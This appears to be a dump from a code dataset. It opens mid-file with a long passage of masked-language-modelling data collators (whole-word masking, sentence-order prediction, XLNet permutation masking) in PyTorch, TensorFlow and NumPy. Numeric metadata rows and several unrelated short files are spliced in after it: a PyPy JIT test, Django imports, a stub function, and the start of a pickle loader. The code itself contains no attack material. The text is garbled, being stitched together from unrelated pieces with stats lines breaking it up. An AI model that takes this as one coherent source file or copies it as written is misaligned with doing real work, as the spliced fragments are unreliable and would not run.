mask_labels = []
for e in examples:
ref_tokens = []
for id in tolist(e["input_ids"]):
token = self.tokenizer._convert_id_to_token(id)
ref_tokens.append(token)
# For Chinese tokens, we need extra inf to mark sub-word, e.g [喜,欢]-> [喜,##欢]
if "chinese_ref" in e:
ref_pos = tolist(e["chinese_ref"])
len_seq = len(e["input_ids"])
for i in range(len_seq):
if i in ref_pos:
ref_tokens[i] = "##" + ref_tokens[i]
mask_labels.append(self._whole_word_mask(ref_tokens))
batch_mask = _numpy_collate_batch(mask_labels, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
inputs, labels = self.numpy_mask_tokens(batch_input, batch_mask)
return {"input_ids": inputs, "labels": labels}
def _whole_word_mask(self, input_tokens: List[str], max_predictions=512):
"""
Get 0/1 labels for masked tokens with whole word mask proxy
"""
if not isinstance(self.tokenizer, (BertTokenizer, BertTokenizerFast)):
warnings.warn(
"DataCollatorForWholeWordMask is only suitable for BertTokenizer-like tokenizers. "
"Please refer to the documentation for more information."
)
cand_indexes = []
for (i, token) in enumerate(input_tokens):
if token == "[CLS]" or token == "[SEP]":
continue
if len(cand_indexes) >= 1 and token.startswith("##"):
cand_indexes[-1].append(i)
else:
cand_indexes.append([i])
random.shuffle(cand_indexes)
num_to_predict = min(max_predictions, max(1, int(round(len(input_tokens) * self.mlm_probability))))
masked_lms = []
covered_indexes = set()
for index_set in cand_indexes:
if len(masked_lms) >= num_to_predict:
break
# If adding a whole-word mask would exceed the maximum number of
# predictions, then just skip this candidate.
if len(masked_lms) + len(index_set) > num_to_predict:
continue
is_any_index_covered = False
for index in index_set:
if index in covered_indexes:
is_any_index_covered = True
break
if is_any_index_covered:
continue
for index in index_set:
covered_indexes.add(index)
masked_lms.append(index)
if len(covered_indexes) != len(masked_lms):
raise ValueError("Length of covered_indexes is not equal to length of masked_lms.")
mask_labels = [1 if i in covered_indexes else 0 for i in range(len(input_tokens))]
return mask_labels
def torch_mask_tokens(self, inputs: Any, mask_labels: Any) -> Tuple[Any, Any]:
"""
Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. Set
'mask_labels' means we use whole word mask (wwm), we directly mask idxs according to it's ref.
"""
import torch
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for masked language modeling. Remove the --mlm flag if you want to use this tokenizer."
)
labels = inputs.clone()
# We sample a few tokens in each sequence for masked-LM training (with probability args.mlm_probability defaults to 0.15 in Bert/RoBERTa)
probability_matrix = mask_labels
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()
]
probability_matrix.masked_fill_(torch.tensor(special_tokens_mask, dtype=torch.bool), value=0.0)
if self.tokenizer._pad_token is not None:
padding_mask = labels.eq(self.tokenizer.pad_token_id)
probability_matrix.masked_fill_(padding_mask, value=0.0)
masked_indices = probability_matrix.bool()
labels[~masked_indices] = -100 # We only compute loss on masked tokens
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = torch.bernoulli(torch.full(labels.shape, 0.8)).bool() & masked_indices
inputs[indices_replaced] = self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)
# 10% of the time, we replace masked input tokens with random word
indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced
random_words = torch.randint(len(self.tokenizer), labels.shape, dtype=torch.long)
inputs[indices_random] = random_words[indices_random]
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
def tf_mask_tokens(self, inputs: Any, mask_labels: Any) -> Tuple[Any, Any]:
"""
Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. Set
'mask_labels' means we use whole word mask (wwm), we directly mask idxs according to it's ref.
"""
import tensorflow as tf
input_shape = tf.shape(inputs)
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for masked language modeling. Remove the --mlm flag if you want to use this tokenizer."
)
labels = tf.identity(inputs)
# We sample a few tokens in each sequence for masked-LM training (with probability args.mlm_probability defaults to 0.15 in Bert/RoBERTa)
masked_indices = tf.cast(mask_labels, tf.bool)
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels
]
masked_indices = masked_indices & ~tf.cast(special_tokens_mask, dtype=tf.bool)
if self.tokenizer._pad_token is not None:
padding_mask = inputs == self.tokenizer.pad_token_id
masked_indices = masked_indices & ~padding_mask
# Replace unmasked indices with -100 in the labels since we only compute loss on masked tokens
labels = tf.where(masked_indices, inputs, -100)
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = self.tf_bernoulli(input_shape, 0.8) & masked_indices
inputs = tf.where(indices_replaced, self.tokenizer.mask_token_id, inputs)
# 10% of the time, we replace masked input tokens with random word
indices_random = self.tf_bernoulli(input_shape, 0.1) & masked_indices & ~indices_replaced
random_words = tf.random.uniform(input_shape, maxval=len(self.tokenizer), dtype=tf.int64)
inputs = tf.where(indices_random, random_words, inputs)
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
def numpy_mask_tokens(self, inputs: Any, mask_labels: Any) -> Tuple[Any, Any]:
"""
Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. Set
'mask_labels' means we use whole word mask (wwm), we directly mask idxs according to it's ref.
"""
import numpy as np
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for masked language modeling. Remove the --mlm flag if you want to use this tokenizer."
)
labels = np.copy(inputs)
# We sample a few tokens in each sequence for masked-LM training (with probability args.mlm_probability defaults to 0.15 in Bert/RoBERTa)
masked_indices = mask_labels.astype(np.bool)
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()
]
masked_indices[np.array(special_tokens_mask, dtype=np.bool)] = 0
if self.tokenizer._pad_token is not None:
padding_mask = labels == self.tokenizer.pad_token_id
masked_indices[padding_mask] = 0
labels[~masked_indices] = -100 # We only compute loss on masked tokens
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = np.random.binomial(1, 0.8, size=labels.shape).astype(np.bool) & masked_indices
inputs[indices_replaced] = self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)
# 10% of the time, we replace masked input tokens with random word
# indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced
indices_random = (
np.random.binomial(1, 0.5, size=labels.shape).astype(np.bool) & masked_indices & ~indices_replaced
)
random_words = np.random.randint(low=0, high=len(self.tokenizer), size=labels.shape, dtype=np.int64)
inputs[indices_random] = random_words[indices_random]
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
@dataclass
class DataCollatorForSOP(DataCollatorForLanguageModeling):
"""
Data collator used for sentence order prediction task.
- collates batches of tensors, honoring their tokenizer's pad_token
- preprocesses batches for both masked language modeling and sentence order prediction
"""
def __init__(self, *args, **kwargs):
warnings.warn(
"DataCollatorForSOP is deprecated and will be removed in a future version, you can now use "
"DataCollatorForLanguageModeling instead.",
FutureWarning,
)
def __call__(self, examples: List[Dict[str, Any]]) -> Dict[str, Any]:
import torch
from torch.nn.utils.rnn import pad_sequence
input_ids = [example["input_ids"] for example in examples]
input_ids = _torch_collate_batch(input_ids, self.tokenizer)
input_ids, labels, attention_mask = self.mask_tokens(input_ids)
token_type_ids = [example["token_type_ids"] for example in examples]
# size of segment_ids varied because randomness, padding zero to the end as the original implementation
token_type_ids = pad_sequence(token_type_ids, batch_first=True, padding_value=self.tokenizer.pad_token_id)
sop_label_list = [example["sentence_order_label"] for example in examples]
sentence_order_label = torch.stack(sop_label_list)
return {
"input_ids": input_ids,
"labels": labels,
"attention_mask": attention_mask,
"token_type_ids": token_type_ids,
"sentence_order_label": sentence_order_label,
}
def mask_tokens(self, inputs: Any) -> Tuple[Any, Any, Any]:
"""
Prepare masked tokens inputs/labels/attention_mask for masked language modeling: 80% MASK, 10% random, 10%
original. N-gram not applied yet.
"""
import torch
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for masked language modeling. Remove the --mlm flag if you want to use this tokenizer."
)
labels = inputs.clone()
# We sample a few tokens in each sequence for masked-LM training (with probability args.mlm_probability defaults to 0.15 in Bert/RoBERTa)
probability_matrix = torch.full(labels.shape, self.mlm_probability)
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()
]
probability_matrix.masked_fill_(torch.tensor(special_tokens_mask, dtype=torch.bool), value=0.0)
if self.tokenizer._pad_token is not None:
padding_mask = labels.eq(self.tokenizer.pad_token_id)
probability_matrix.masked_fill_(padding_mask, value=0.0)
masked_indices = torch.bernoulli(probability_matrix).bool()
# probability be `1` (masked), however in albert model attention mask `0` means masked, revert the value
attention_mask = (~masked_indices).float()
if self.tokenizer._pad_token is not None:
attention_padding_mask = labels.eq(self.tokenizer.pad_token_id)
attention_mask.masked_fill_(attention_padding_mask, value=1.0)
labels[~masked_indices] = -100 # We only compute loss on masked tokens, -100 is default for CE compute
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = torch.bernoulli(torch.full(labels.shape, 0.8)).bool() & masked_indices
inputs[indices_replaced] = self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)
# 10% of the time, we replace masked input tokens with random word
indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced
random_words = torch.randint(len(self.tokenizer), labels.shape, dtype=torch.long)
inputs[indices_random] = random_words[indices_random]
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels, attention_mask
@dataclass
class DataCollatorForPermutationLanguageModeling(DataCollatorMixin):
"""
Data collator used for permutation language modeling.
- collates batches of tensors, honoring their tokenizer's pad_token
- preprocesses batches for permutation language modeling with procedures specific to XLNet
"""
tokenizer: PreTrainedTokenizerBase
plm_probability: float = 1 / 6
max_span_length: int = 5 # maximum length of a span of masked tokens
return_tensors: str = "pt"
def torch_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
if isinstance(examples[0], Mapping):
examples = [e["input_ids"] for e in examples]
batch = _torch_collate_batch(examples, self.tokenizer)
inputs, perm_mask, target_mapping, labels = self.torch_mask_tokens(batch)
return {"input_ids": inputs, "perm_mask": perm_mask, "target_mapping": target_mapping, "labels": labels}
def tf_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
if isinstance(examples[0], Mapping):
examples = [e["input_ids"] for e in examples]
batch = _tf_collate_batch(examples, self.tokenizer)
inputs, perm_mask, target_mapping, labels = self.tf_mask_tokens(batch)
return {"input_ids": inputs, "perm_mask": perm_mask, "target_mapping": target_mapping, "labels": labels}
def numpy_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
if isinstance(examples[0], Mapping):
examples = [e["input_ids"] for e in examples]
batch = _numpy_collate_batch(examples, self.tokenizer)
inputs, perm_mask, target_mapping, labels = self.numpy_mask_tokens(batch)
return {"input_ids": inputs, "perm_mask": perm_mask, "target_mapping": target_mapping, "labels": labels}
def torch_mask_tokens(self, inputs: Any) -> Tuple[Any, Any, Any, Any]:
"""
The masked tokens to be predicted for a particular sequence are determined by the following algorithm:
0. Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far).
1. Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked)
2. Reserve a context of length `context_length = span_length / plm_probability` to surround span to be
masked
3. Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length -
span_length]` and mask tokens `start_index:start_index + span_length`
4. Set `cur_len = cur_len + context_length`. If `cur_len < max_len` (i.e. there are tokens remaining in the
sequence to be processed), repeat from Step 1.
"""
import torch
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for permutation language modeling. Please add a mask token if you want to use this tokenizer."
)
if inputs.size(1) % 2 != 0:
raise ValueError(
"This collator requires that sequence lengths be even to create a leakage-free perm_mask. Please see relevant comments in source code for details."
)
labels = inputs.clone()
# Creating the mask and target_mapping tensors
masked_indices = torch.full(labels.shape, 0, dtype=torch.bool)
target_mapping = torch.zeros((labels.size(0), labels.size(1), labels.size(1)), dtype=torch.float32)
for i in range(labels.size(0)):
# Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far).
cur_len = 0
max_len = labels.size(1)
while cur_len < max_len:
# Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked)
span_length = torch.randint(1, self.max_span_length + 1, (1,)).item()
# Reserve a context of length `context_length = span_length / plm_probability` to surround the span to be masked
context_length = int(span_length / self.plm_probability)
# Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length - span_length]` and mask tokens `start_index:start_index + span_length`
start_index = cur_len + torch.randint(context_length - span_length + 1, (1,)).item()
masked_indices[i, start_index : start_index + span_length] = 1
# Set `cur_len = cur_len + context_length`
cur_len += context_length
# Since we're replacing non-masked tokens with -100 in the labels tensor instead of skipping them altogether,
# the i-th predict corresponds to the i-th token.
target_mapping[i] = torch.eye(labels.size(1))
special_tokens_mask = torch.tensor(
[self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()],
dtype=torch.bool,
)
masked_indices.masked_fill_(special_tokens_mask, value=0.0)
if self.tokenizer._pad_token is not None:
padding_mask = labels.eq(self.tokenizer.pad_token_id)
masked_indices.masked_fill_(padding_mask, value=0.0)
# Mask indicating non-functional tokens, where functional tokens are [SEP], [CLS], padding, etc.
non_func_mask = ~(padding_mask | special_tokens_mask)
inputs[masked_indices] = self.tokenizer.mask_token_id
labels[~masked_indices] = -100 # We only compute loss on masked tokens
perm_mask = torch.zeros((labels.size(0), labels.size(1), labels.size(1)), dtype=torch.float32)
for i in range(labels.size(0)):
# Generate permutation indices i.e. sample a random factorisation order for the sequence. This will
# determine which tokens a given token can attend to (encoded in `perm_mask`).
# Note: Length of token sequence being permuted has to be less than or equal to reused sequence length
# (see documentation for `mems`), otherwise information may leak through due to reuse. In this implementation,
# we assume that reused length is half of sequence length and permutation length is equal to reused length.
# This requires that the sequence length be even.
# Create a linear factorisation order
perm_index = torch.arange(labels.size(1))
# Split this into two halves, assuming that half the sequence is reused each time
perm_index = perm_index.reshape((-1, labels.size(1) // 2)).transpose(0, 1)
# Permute the two halves such that they do not cross over
perm_index = perm_index[torch.randperm(labels.size(1) // 2)]
# Flatten this out into the desired permuted factorisation order
perm_index = torch.flatten(perm_index.transpose(0, 1))
# Set the permutation indices of non-masked (non-functional) tokens to the
# smallest index (-1) so that:
# (1) They can be seen by all other positions
# (2) They cannot see masked positions, so there won't be information leak
perm_index.masked_fill_(~masked_indices[i] & non_func_mask[i], -1)
# The logic for whether the i-th token can attend on the j-th token based on the factorisation order:
# 0 (can attend): If perm_index[i] > perm_index[j] or j is neither masked nor a functional token
# 1 (cannot attend): If perm_index[i] <= perm_index[j] and j is either masked or a functional token
perm_mask[i] = (
perm_index.reshape((labels.size(1), 1)) <= perm_index.reshape((1, labels.size(1)))
) & masked_indices[i]
return inputs.long(), perm_mask, target_mapping, labels.long()
def tf_mask_tokens(self, inputs: Any) -> Tuple[Any, Any, Any, Any]:
"""
The masked tokens to be predicted for a particular sequence are determined by the following algorithm:
0. Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far).
1. Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked)
2. Reserve a context of length `context_length = span_length / plm_probability` to surround span to be
masked
3. Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length -
span_length]` and mask tokens `start_index:start_index + span_length`
4. Set `cur_len = cur_len + context_length`. If `cur_len < max_len` (i.e. there are tokens remaining in the
sequence to be processed), repeat from Step 1.
"""
from random import randint
import numpy as np
import tensorflow as tf
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for permutation language modeling. Please add a mask token if you want to use this tokenizer."
)
if tf.shape(inputs)[1] % 2 != 0:
raise ValueError(
"This collator requires that sequence lengths be even to create a leakage-free perm_mask. Please see relevant comments in source code for details."
)
labels = tf.identity(inputs)
# Creating the mask and target_mapping tensors
masked_indices = np.full(labels.shape.as_list(), 0, dtype=np.bool)
labels_shape = tf.shape(labels)
target_mapping = np.zeros((labels_shape[0], labels_shape[1], labels_shape[1]), dtype=np.float32)
for i in range(len(labels)):
# Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far).
cur_len = 0
max_len = tf.shape(labels)[1]
while cur_len < max_len:
# Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked)
span_length = randint(1, self.max_span_length + 1)
# Reserve a context of length `context_length = span_length / plm_probability` to surround the span to be masked
context_length = int(span_length / self.plm_probability)
# Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length - span_length]` and mask tokens `start_index:start_index + span_length`
start_index = cur_len + randint(0, context_length - span_length + 1)
masked_indices[i, start_index : start_index + span_length] = 1
# Set `cur_len = cur_len + context_length`
cur_len += context_length
# Since we're replacing non-masked tokens with -100 in the labels tensor instead of skipping them altogether,
# the i-th predict corresponds to the i-th token.
target_mapping[i] = np.eye(labels_shape[1])
masked_indices = tf.cast(tf.convert_to_tensor(masked_indices), dtype=tf.bool)
target_mapping = tf.convert_to_tensor(target_mapping)
special_tokens_mask = tf.convert_to_tensor(
[
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True)
for val in labels.numpy().tolist()
],
)
special_tokens_mask = tf.cast(special_tokens_mask, dtype=tf.bool)
masked_indices = masked_indices & ~special_tokens_mask
if self.tokenizer._pad_token is not None:
padding_mask = labels == self.tokenizer.pad_token_id
masked_indices = masked_indices & ~padding_mask
# Mask indicating non-functional tokens, where functional tokens are [SEP], [CLS], padding, etc.
non_func_mask = ~(padding_mask | special_tokens_mask)
inputs = tf.where(masked_indices, self.tokenizer.mask_token_id, inputs)
labels = tf.where(masked_indices, labels, -100) # We only compute loss on masked tokens
perm_mask = []
for i in range(len(labels)):
# Generate permutation indices i.e. sample a random factorisation order for the sequence. This will
# determine which tokens a given token can attend to (encoded in `perm_mask`).
# Note: Length of token sequence being permuted has to be less than or equal to reused sequence length
# (see documentation for `mems`), otherwise information may leak through due to reuse. In this implementation,
# we assume that reused length is half of sequence length and permutation length is equal to reused length.
# This requires that the sequence length be even.
# Create a linear factorisation order
# tf.range is the equivalent of torch.arange
perm_index = tf.range(labels_shape[1])
# Split this into two halves, assuming that half the sequence is reused each time
perm_index = tf.transpose(tf.reshape(perm_index, (-1, labels_shape[1] // 2)))
# Permute the two halves such that they do not cross over
perm_index = tf.random.shuffle(perm_index) # Shuffles along the first dimension
# Flatten this out into the desired permuted factorisation order
perm_index = tf.reshape(tf.transpose(perm_index), (-1,))
# Set the permutation indices of non-masked (non-functional) tokens to the
# smallest index (-1) so that:
# (1) They can be seen by all other positions
# (2) They cannot see masked positions, so there won't be information leak
perm_index = tf.where(~masked_indices[i] & non_func_mask[i], -1, perm_index)
# The logic for whether the i-th token can attend on the j-th token based on the factorisation order:
# 0 (can attend): If perm_index[i] > perm_index[j] or j is neither masked nor a functional token
# 1 (cannot attend): If perm_index[i] <= perm_index[j] and j is either masked or a functional token
perm_mask.append(
(tf.reshape(perm_index, (labels_shape[1], 1)) <= tf.reshape(perm_index, (1, labels_shape[1])))
& masked_indices[i]
)
perm_mask = tf.stack(perm_mask, axis=0)
return tf.cast(inputs, tf.int64), tf.cast(perm_mask, tf.float32), target_mapping, tf.cast(labels, tf.int64)
def numpy_mask_tokens(self, inputs: Any) -> Tuple[Any, Any, Any, Any]:
"""
The masked tokens to be predicted for a particular sequence are determined by the following algorithm:
0. Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far).
1. Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked)
2. Reserve a context of length `context_length = span_length / plm_probability` to surround span to be
masked
3. Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length -
span_length]` and mask tokens `start_index:start_index + span_length`
4. Set `cur_len = cur_len + context_length`. If `cur_len < max_len` (i.e. there are tokens remaining in the
sequence to be processed), repeat from Step 1.
"""
from random import randint
import numpy as np
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for permutation language modeling. Please add a mask token if you want to use this tokenizer."
)
if inputs.shape[1] % 2 != 0:
raise ValueError(
"This collator requires that sequence lengths be even to create a leakage-free perm_mask. Please see relevant comments in source code for details."
)
labels = np.copy(inputs)
# Creating the mask and target_mapping tensors
masked_indices = np.full(labels.shape, 0, dtype=np.bool)
target_mapping = np.zeros((labels.shape[0], labels.shape[1], labels.shape[1]), dtype=np.float32)
for i in range(labels.shape[0]):
# Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far).
cur_len = 0
max_len = labels.shape[1]
while cur_len < max_len:
# Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked)
span_length = randint(1, self.max_span_length + 1)
# Reserve a context of length `context_length = span_length / plm_probability` to surround the span to be masked
context_length = int(span_length / self.plm_probability)
# Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length - span_length]` and mask tokens `start_index:start_index + span_length`
start_index = cur_len + randint(0, context_length - span_length + 1)
masked_indices[i, start_index : start_index + span_length] = 1
# Set `cur_len = cur_len + context_length`
cur_len += context_length
# Since we're replacing non-masked tokens with -100 in the labels tensor instead of skipping them altogether,
# the i-th predict corresponds to the i-th token.
target_mapping[i] = np.eye(labels.shape[1])
special_tokens_mask = np.array(
[self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()],
dtype=np.bool,
)
masked_indices[special_tokens_mask] = 0
if self.tokenizer._pad_token is not None:
padding_mask = labels == self.tokenizer.pad_token_id
masked_indices[padding_mask] = 0.0
# Mask indicating non-functional tokens, where functional tokens are [SEP], [CLS], padding, etc.
non_func_mask = ~(padding_mask | special_tokens_mask)
inputs[masked_indices] = self.tokenizer.mask_token_id
labels[~masked_indices] = -100 # We only compute loss on masked tokens
perm_mask = np.zeros((labels.shape[0], labels.shape[1], labels.shape[1]), dtype=np.float32)
for i in range(labels.shape[0]):
# Generate permutation indices i.e. sample a random factorisation order for the sequence. This will
# determine which tokens a given token can attend to (encoded in `perm_mask`).
# Note: Length of token sequence being permuted has to be less than or equal to reused sequence length
# (see documentation for `mems`), otherwise information may leak through due to reuse. In this implementation,
# we assume that reused length is half of sequence length and permutation length is equal to reused length.
# This requires that the sequence length be even.
# Create a linear factorisation order
perm_index = np.arange(labels.shape[1])
# Split this into two halves, assuming that half the sequence is reused each time
perm_index = perm_index.reshape((-1, labels.shape[1] // 2)).T
# Permute the two halves such that they do not cross over
np.random.shuffle(perm_index)
# Flatten this out into the desired permuted factorisation order
perm_index = perm_index.T.flatten()
# Set the permutation indices of non-masked (non-functional) tokens to the
# smallest index (-1) so that:
# (1) They can be seen by all other positions
# (2) They cannot see masked positions, so there won't be information leak
perm_index[~masked_indices[i] & non_func_mask[i]] = -1
# The logic for whether the i-th token can attend on the j-th token based on the factorisation order:
# 0 (can attend): If perm_index[i] > perm_index[j] or j is neither masked nor a functional token
# 1 (cannot attend): If perm_index[i] <= perm_index[j] and j is either masked or a functional token
perm_mask[i] = (
perm_index.reshape((labels.shape[1], 1)) <= perm_index.reshape((1, labels.shape[1]))
) & masked_indices[i]
return inputs.astype(np.int64), perm_mask, target_mapping, labels.astype(np.int64)
| 49.960235
| 181
| 0.652083
| 10,417
| 76,639
| 4.633868
| 0.061246
| 0.024777
| 0.023948
| 0.02082
| 0.811377
| 0.788051
| 0.774295
| 0.757826
| 0.742247
| 0.730894
| 0
| 0.009796
| 0.260729
| 76,639
| 1,533
| 182
| 49.992825
| 0.842191
| 0.327966
| 0
| 0.549721
| 0
| 0.011173
| 0.076129
| 0.00385
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043575
| false
| 0.001117
| 0.044693
| 0
| 0.184358
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
fc4fa4bfabc51f3c680545b499ee16fcc5d20013
| 268
|
py
|
Python
|
rpython/jit/backend/aarch64/test/test_list.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 333
|
2015-08-08T18:03:38.000Z
|
2022-03-22T18:13:12.000Z
|
rpython/jit/backend/aarch64/test/test_list.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 7
|
2020-02-16T16:49:05.000Z
|
2021-11-26T09:00:56.000Z
|
rpython/jit/backend/aarch64/test/test_list.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 55
|
2015-08-16T02:41:30.000Z
|
2022-03-20T20:33:35.000Z
|
from rpython.jit.metainterp.test.test_list import ListTests
from rpython.jit.backend.aarch64.test.test_basic import JitAarch64Mixin
class TestList(JitAarch64Mixin, ListTests):
# for individual tests see
# ====> ../../../metainterp/test/test_list.py
pass
| 29.777778
| 71
| 0.753731
| 33
| 268
| 6.030303
| 0.606061
| 0.120603
| 0.140704
| 0.221106
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025641
| 0.126866
| 268
| 8
| 72
| 33.5
| 0.824786
| 0.253731
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
fc64b2b95d542e870e92e2a2fce3e0b080d9bb86
| 201
|
py
|
Python
|
lms/lms_app/models.py
|
leooAprigioo/ac-lp
|
e1428ea4f73629de999ec0b8a190779afdf6c488
|
[
"Apache-2.0"
] | null | null | null |
lms/lms_app/models.py
|
leooAprigioo/ac-lp
|
e1428ea4f73629de999ec0b8a190779afdf6c488
|
[
"Apache-2.0"
] | null | null | null |
lms/lms_app/models.py
|
leooAprigioo/ac-lp
|
e1428ea4f73629de999ec0b8a190779afdf6c488
|
[
"Apache-2.0"
] | null | null | null |
from django.db import models
from lms_app.professor import Professor
from lms_app.disciplina import Disciplina
from lms_app.aluno import Aluno
from lms_app.disciplinaOfertada import DisciplinaOfertada
| 33.5
| 57
| 0.875622
| 29
| 201
| 5.931034
| 0.37931
| 0.162791
| 0.232558
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.099502
| 201
| 6
| 57
| 33.5
| 0.950276
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
fca1309e28aabffedaf6d33aaf02810f093fa982
| 47
|
py
|
Python
|
bin/create_result_relatory_template/create_test_relatory_template/__main__.py
|
danilocgsilva/a_vs_n
|
fb807d6c785e188a0024ba2ef8e4b16117432dd4
|
[
"MIT"
] | null | null | null |
bin/create_result_relatory_template/create_test_relatory_template/__main__.py
|
danilocgsilva/a_vs_n
|
fb807d6c785e188a0024ba2ef8e4b16117432dd4
|
[
"MIT"
] | null | null | null |
bin/create_result_relatory_template/create_test_relatory_template/__main__.py
|
danilocgsilva/a_vs_n
|
fb807d6c785e188a0024ba2ef8e4b16117432dd4
|
[
"MIT"
] | null | null | null |
def main():
print("Not implemented yet.")
| 11.75
| 33
| 0.617021
| 6
| 47
| 4.833333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.212766
| 47
| 3
| 34
| 15.666667
| 0.783784
| 0
| 0
| 0
| 0
| 0
| 0.434783
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
5d7f7c41077d5abe98d9d5eea05bfe26e367da6d
| 379
|
py
|
Python
|
generate_files/load_pickle_for_R.py
|
justinsavoie/justinsavoie.github.io
|
67ed6e5e1f8430d123832fc992d6a7f56b9592b4
|
[
"MIT"
] | null | null | null |
generate_files/load_pickle_for_R.py
|
justinsavoie/justinsavoie.github.io
|
67ed6e5e1f8430d123832fc992d6a7f56b9592b4
|
[
"MIT"
] | null | null | null |
generate_files/load_pickle_for_R.py
|
justinsavoie/justinsavoie.github.io
|
67ed6e5e1f8430d123832fc992d6a7f56b9592b4
|
[
